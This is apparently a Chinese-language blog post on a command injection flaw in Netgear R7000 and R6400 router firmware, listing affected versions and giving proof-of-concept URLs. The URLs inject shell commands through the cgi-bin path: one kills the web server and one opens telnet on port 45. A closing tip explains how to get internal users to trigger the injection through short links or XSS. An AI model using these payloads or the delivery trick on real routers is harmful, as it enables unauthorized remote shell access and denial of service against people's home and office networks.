AD

NETGEAR_R7000及R6400 命令注入执行

  Netgear R7000, 固件版本 1.0.7.2_1.1.93 以及更早期版本, R6400固件版本 1.0.1.6_1.0.4 以及更早期版本, 包含一个包含任意命令注入漏洞.

影响范围:
Netgear R7000路由器,固件版本为1.0.7.2_1.1.93(可能包括更早版本);
Netgear R6400路由器,固件版本为1.0.1.6_1.0.4(可能包括更早版本);
USCERT社区上报称,R8000,固件版本1.0.3.4_1.1.2也受影响;可能还有其他型号受到影响。


POC:
http:///cgi-bin/;COMMAND

http:///cgi-bin/;killall$IFS'httpd'
在执行这一步之后,除非重启,否则路由器的web管理将一直不可用,可以利用执行该命令,造成netgear的WEB管理不可用,缓解漏洞。

http://RouterIP/;telnetd$IFS-p$IFS'45'
将在45端口开启telnet服务


利用技巧:
可以通过短链接或者XSS,构造一个POC,内网用户访问后,即可在netgear网关执行命令。

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce